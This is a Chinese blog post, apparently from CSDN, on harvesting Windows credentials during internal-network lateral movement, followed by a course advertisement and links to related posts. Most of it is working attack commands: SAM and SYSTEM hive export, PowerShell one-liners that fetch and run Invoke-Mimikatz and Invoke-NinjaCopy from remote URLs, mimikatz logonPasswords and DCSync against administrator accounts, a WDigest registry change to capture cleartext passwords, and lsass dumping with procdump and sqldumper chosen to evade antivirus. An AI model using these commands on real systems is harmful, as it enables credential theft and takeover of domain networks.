内网横向渗透之密码搜集

已于 2024-01-18 23:49:34 修改
阅读量326 收藏
点赞数
文章标签: 开发语言 sublime text 编辑器
于 2023-08-19 23:10:33 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/dzqxwzoe/article/details/132385675
版权

一、前言

由于本人是第一次写文章,算是对自己的知识进行梳理也算是炒冷饭了,欢迎大家的批评与建议。

本文仅用于技术讨论与研究,对于文中所有的工具以及命令,都是本人自行搭建的环境进行测试的。文中使用的技术仅用于学习教育目的,如果文中出现的技术用于其他任何目的及目标,作者概不负责。

二、常见的方法

1.抓取本地SAM文件中的密码 从注册表中导出

reg save HKLM\SYSTEM sys.hiv #获取SYSTEM注册表信息,导出为sys.hiv文件

reg save HKLM\SAM sam.hiv
#获取SAM注册表信息,导出为sam.hiv文件1614067076_6034b5848d40e66001ab5.png!small?1614067076832

2.还可以使用nihs_x0008_ng中的Invoke-NinjaCopy.ps1脚本导出

①导出SAM文件 Invoke-NinjaCopy -Path “C:\Windows\System32\con fig\SYSTEM”
-LocalDestination “C:\Windows\Temp\PowerShell-master\PowerShell-master\Invoke-
NinjaCopy\sys.hiv”

②导出SYSTEM文件 Invoke-NinjaCopy -Path “C:\Windows\System32\conf ig\SAM”
-LocalDestination “C:\Windows\Temp\PowerShell-master\PowerShell-master\Invoke-
NinjaCopy\sam.hiv”

Ninja-copy

在线加载: powershell -exec bypass “IEX (New-Object
Net.WebClient).DownloadString(‘http://ip/Invoke-NinjaCopy.ps1’);Invoke-
NinjaCopy -Path C:\Windows\System32\config\SAM -LocalDestination C:\SAM.txt;”

本地加载: powershell -exec bypass “Import-Module .\Invoke-NinjaCopy.ps1;Invoke-
NinjaCopy -Path C:\Windows\System32\config\SAM -LocalDestination sam.hive”

利用empire里面的Invoke-PowerDump.ps1脚本,下载地址:
[https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-
PowerDump.ps1
](https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-
PowerDump.ps1)

从左到右依次是: 用户名 : Rid : ntlm : lm:::
Rid为500代表是管理员,504代表是guest账号等。lm跟ntlm的区别是加密方法的不同

1614071965_6034c89d7bceebc09b4c9.png!small

用mimikatz解密导出的两个文件

privilege::debug #提升权限

lsadump::sam /sam:sam.hiv /system:sys.hiv #mimikatz运行解密命令

1614072056_6034c8f8aeac5d43c10bf.png!small?16140720572611614072046_6034c8ee0f67287a6a760.png!small?1614072046487

当我们没法使用交互式的命令时可以使用下面的命令导出

powershell “IEX (New-Object
Net.WebClient).DownloadString(‘https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-
Mimikatz.ps1’); Invoke-Mimikatz -DumpCreds”

mimikatz

privilege::debug 提升权限

sekurlsa::logonPasswords 抓取密码

mimikatz.exe “privilege::debug” “sekurlsa::logonPasswords” “exit” > pass.txt

lsadump::sam /sam:Sam.hiv /system:System.hiv 导出用户hash

使用PowerShell Mimikatz

使用Mimikatz的DCSync 远程转储Active Directory凭证提取用户帐户的密码数据: Mimikatz
“privilege::debug” "lsadump::dcsync /domain:xxx /user:dbadmin"exit

管理员用户帐户提取密码数据:

Mimikatz “privilege::debug” “lsadump::dcsync /domain:xxx /user:Administrator”
exit

使用mimikatz.exe,执行ts::multirdp允许多用户远程登录

需要说明一下的是,当系统为win10或者win2012R2以上时,默认内存缓存中禁止保存明文密码,此时可以通过修改组测表的方式抓取明文,但是需要用户重新登陆后才能抓取成功。
命令如下:

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v
UseLogonCredential /t REG_DWORD /d 1 /f

当重启服务器的时候,我们重新加载mimikatz,就可以抓取密码。

1614072342_6034ca16ef1ce103e745b.png!small?1614072343612

saminside

用saminside解密导出的两个文件 打开工具saminside导入sam与system文件 如图:

1614072398_6034ca4e3536728ee4965.png!small?1614072398568

procdump+mimikatz

①把lsass进程文件拖回本地破解(因为直接上传会报杀)注意工具与目标系统位数要一致

procdump.exe -accepteula -ma lsass.exe c:\lsass.dmp
#在目标机子执行导出为lsass.dmp,然后拖回本地

1614072445_6034ca7dc4f0f95fbc2d9.png!small?1614072446346

挂载lsass.dmp文件 sekurlsa::minidump lsass.dmp #挂载lsass.dmp

1614072461_6034ca8d86d4948146fd1.png!small?1614072461726

抓取lsass.dmp文件中的密码 log #会在目录下生成.log文件,方便查看 sekurlsa::logonpasswords
#mimikatz执行,在拖回的.dmp文件抓取密码

sqldumper+mimikatz

①首先查看lsass进程的PID tasklist /svc |findstr lsass.exe

②利用sqldumper转储 Sqldumper.exe 0 0x01100 #后面的数字是固定的,然后就会生成Sqlxxx.mdmp文件

③利用mimikatz抓取hash sekurlsa::minidump SQLDmpr0001.mdmp sekurlsa::logonPasswords

总结

希望大家多多批评指导,本人也是一个刚刚打开安全大门的弱鸡大家共同努力为网络安全添砖加瓦。

hash sekurlsa::minidump SQLDmpr0001.mdmp sekurlsa::logonPasswords

总结

希望大家多多批评指导,本人也是一个刚刚打开安全大门的弱鸡大家共同努力为网络安全添砖加瓦。

学习计划安排


我一共划分了六个阶段,但并不是说你得学完全部才能上手工作,对于一些初级岗位,学到第三四个阶段就足矣~

这里我整合并且整理成了一份【282G】的网络安全从零基础入门到进阶资料包,需要的小伙伴可以扫描下方CSDN官方合作二维码免费领取哦,无偿分享!!!

如果你对网络安全入门感兴趣,那么你需要的话可以

点击这里👉网络安全重磅福利:入门&进阶全套282G学习资源包免费分享!

①网络安全学习路线
②上百份渗透测试电子书
③安全攻防357页笔记
④50份安全攻防面试指南
⑤安全红队渗透工具包
⑥HW护网行动经验总结
⑦100个漏洞实战案例
⑧安全大厂内部视频资源
⑨历年CTF夺旗赛题解析

内网渗透-内网代理穿透和内网横向移动
lza20001103的博客
09-23 2863
内网代理穿透和内网横向移动 文章目录内网代理穿透和内网横向移动前言内网代理穿透nctermite(ew)ssh正向代理(A,B,C)msf设置路由和sock4代理访问内网流量内网横向移动后记 前言 进入内网后,我们就要扫描内网中有哪些主机了,重点是我们外网是无法访问内网的主机的,所在网段是不一样的,这时就需要我们设置代理和路由进行访问内网的流量了。上一期讲解了信息收集的相关内容,收集网段,补丁和域中成员以及域控的信息,对以下的横向移动至关重要,对后期的提权做好了准备。 内网代理穿透 首先,我们介绍几种代理工
内网渗透 | 最全的内网凭据密码收集方法和技巧总结
Ms08067安全实验室
02-03 9323
内网凭据密码收集指南原创投稿作者:深蓝实验室天威战队前言在攻防场景下,红队人员拿下一台终端或服务器后,第一步要做的往往就是信息收集,为最大化利用权限,扩大战果,密码取必不可少,这里针对常见应用软件和系统等密码取做了记录和总结,希望能帮助你作为参考。RDP凭证本机RDP密码取本机RDP密码是一个我们常遇到的场景,通常使用mimikatz取RDP密码。当系统为win10或2012R2以上时,默...
内网搜集各类密码文件
qq_44657899的博客
10-20 573
文章目录dirfindstr dir dir 命令搜集各类敏感密码配置⽂件,在C盘中建议从 User ⽬录下开始搜集 dir /b /s user.*,pass.*,config.*,username.*,password.* findstr findstr 命令查找某个⽂件的某个字段,查找⼀个⽂件⾥有没有 user 、 pass 等字段内容 shell findstr /c:"user" /c:"pass" /si *.txt ...
内网渗透靶场(上)加入目标网段,取管理员密码 #zkaq
anlalu233的博客
09-17 1497
1、探测是否有sql注入: (1)从ur看, 传递了id=1这个参数;这里有可能涉及到和数据库交互,为了确认是否存在sql注入,这里故意构造and 1=2这个false的条件,看看页面返回啥: (2)果然页面报错,说明存在sql注入,并且还有个关键信息:当前页面在C:\phpStudy\WWW\这个目录下; (3)通过order by看看当前表有多少字段:order by 2是正常的,order by 3就异常了,说明有2个字段; (4)接着看看页面有没有报错点,方便后续观察结果...
渗透测试之破解密码(3)
qq_42955000的博客
04-09 938
渗透测试之破解密码(3)常见密码破解技术被动在线攻击主动在线攻击离线攻击彩虹表使用非技术性方法闪存驱动器窃取密码提升权限 常见密码破解技术 名称 攻击方式 字典攻击 尝试常用密码表 暴力攻击 尝试字符的所有可能组合 混合攻击 在字典攻击基础上加入通用密码常用的1或! 被动攻击 网络监听,分析数据流量以寻找密码 主动在线攻击 更加深入接触目标 离线攻击 攻击者设法取得存储密码的凭据 非技术性攻击 社会工程学 被动在线攻击 嗅探之所以成为有效的信息收集方式是因为人们使
在Kali Linux中的内网横向渗透方法
最新发布
m0_73890999的博客
11-06 909
虽然我们成功入侵目标主机并在其中安装了后门,但是我们入侵的目标主机只是网络中的一台,为了入侵网络中的其他主机,我们需要以入侵的主机位跳板,在网络中进行横向移动。
内网横向渗透之各种传递攻击
技术超强的网络安全平台
05-06 2434
内网横向渗透之各种传递攻击 前言 在前面一篇文章已经对内网信息收集做了详细介绍,所需要的内网环境也包含在那篇文章中,接下来将以前期内网信息收集到的信息为基础介绍各种明文或hash传递攻击进行横向渗透横向渗透 在拿下一台内网主机后,利用既有的资源尝试获取更多的凭据、更高的权限,一步一步拿下更多的主机,进而达到控制整个内网、获取到最高权限、发动高级持续性威胁攻击的目的。我们掌握的方法越多,可能拿到的主机权限的机会就越大。 利用PsExec工具进行横向渗透 PsExec 最强大的功能之一是在远程系统和远程支持
内网安全学习(二)---横向渗透
qi_SJQ_的博客
02-09 4282
域横向批量 at&schtasks&impacket 权限提升的思路以在之前博客已介绍过,在后渗透中更推荐 :先信息收集 再提权 再进行内网渗透 的思路,此篇及之后着重学习内网渗透技术。 1.横向渗透—明文传递at&schtasks: 在拿下一台内网主机后,通过本地信息收集用户凭证等信息后,之后如何横向渗透拿下更多的主机? 这里仅介绍 at&schtasks 命令的使用,在已知目标系统的用户明文密码的基础上,直接可以在远程主 机上执行命令。 [at] & [sc
【渗透测试笔记】之【内网渗透——横向渗透(1)登录认证】_内网渗透system权限登录(1)
2401_84970385的博客
05-13 1011
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
内网渗透篇-信息收集
qax
04-14 5424
内网渗透命令大全,内网信息收集
渗透小方法-万能密码+爆路径
Grey的博客
03-22 4492
网站后台万能密码/10大常用弱口令【脚本漏洞】所谓万能密码就是绕过登录验证直接进入管理员后台的密码,这种类型的密码可以通用到很多存在此漏洞的网站所以称之为万能。自己也有过收集,别人总结的我又添加了几个asp aspx万能密码1:”or “a”=”a2: ‘)or(‘a’=’a3:or 1=1–4:’or 1=1–5:a’or’ 1=1–6:”or 1=1–7:’or’a’=’a8:”or”=”a’...
渗透之密码暴力破解
qq_64302290的博客
04-27 634
一般适用于知道用户名不知道密码的时候,只能使用密码字典一个一个试出来。使用工具burp suite,搭建靶场dvwa;打开浏览器的代理功能,将流量全流向burp suite工具拦截。
web安全渗透——7(密码暴力破解+hydra)
weixin_44826485的博客
02-08 1419
一、简介 暴力破解是最流行的密码破解方法之一,然而,它不仅仅是密码破解。暴力破解还可用于发现Web应用程序中的隐藏页面和内容,在你成功之前,这种破解基本上是“破解一次尝试一次”。这种破解有时需要更长的时间,但其成功率也会更高。 二、思路 使用软件hydra进行尝试 1,hydra(使用方法) 2,medusa、patator、BrutesPray、MSF(了解) 三、开始 1.1 开始 输入 xhydra打开图像画页面 1.2 Target 输入目标IP、选择第三个框里面的登录方式,如果默认端口,端口就不
渗透测试中的密码扫描与破解技巧
printwsl的博客
10-31 2810
渗透测试中的密码扫描与破解技巧 (源地址http://www.91ri.org/9174.html) 0x00 前言 一次测试的过程总会涉及到”密码”与”加解密”.在踩点的过程中,对弱口令的尝试是必不可少的过程,从xx鸡到内网哈希批量传递,从个人PC到⽹网络设备/工控设施,只要依旧采用单因素模式的密码认证,密码扫描就不会被遗忘.以下笔者简单分享总结安全测试中密码扫描与破解的技巧,如有疏漏错误...
渗透小助手——几个密码收集工具
weixin_30783913的博客
07-08 593
本文转自360安全播报 在渗透测试中,尤其是在内网渗透中,收集密码是渗透师必做的事情。今天小编就来给大家推荐几个收集密码的实用小工具。当然这些工具不仅仅是可以用在渗透中,实际生活中有时也能帮到我们。 WebBrowserPassView 顾名思义,这是一个读取浏览器里存储的密码的工具。目前该工具支持读取IE4.0~11.0,火狐全版本、Chrome、Safari和Opera浏览器里的密码...
Windows密码凭证获取学习
crowsec
08-08 5034
一般来说,在我们获取到Windows的system权限之后,一般都喜欢去看下密码,哪怕是hash,也想尝试去解一下,Windows下的安全认证机制总共有两种,一种是基于NTLM的认证方式,主要用在早期的Windows工作组环境中;另一种是基于Kerberos的认证方式,主要用在域环境中。...
密码取--reg免杀hash
网络安全。
02-13 1602
1、下载下面3个文件 reg save HKLM\SYSTEM sys.hiv reg save HKLM\SAM sam.hiv reg save hklm\security security.hiv 2、获取密码hash 方法1:使用mimikatz(本地机器系统与位数最好与目标主机保持一致) mimikatz.exe “lsadump::sam /system:sys.hiv /sam:...
第51篇:某运营商外网打点到内网横向渗透的全过程
热门推荐
ABC_123的博客
02-11 1万+
Part1 前言大家好,我是ABC_123,不知不觉,我一个人已经连续写了51篇原创文章了。本期复盘一次之前做过的某运营商的外网打点到内网横向过程,由于是好多年前的了,很多细节记不清了,但是关键步骤还记得。这次渗透过程的特点是内网很大,打到了域控及核心数据库区,但是却没用到什么高深技术,用的都是常规手段,经验很重要。接下来就把完整过程分享给大家,希望对大家有一些帮助。欢迎关注我的公众号"ABC...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值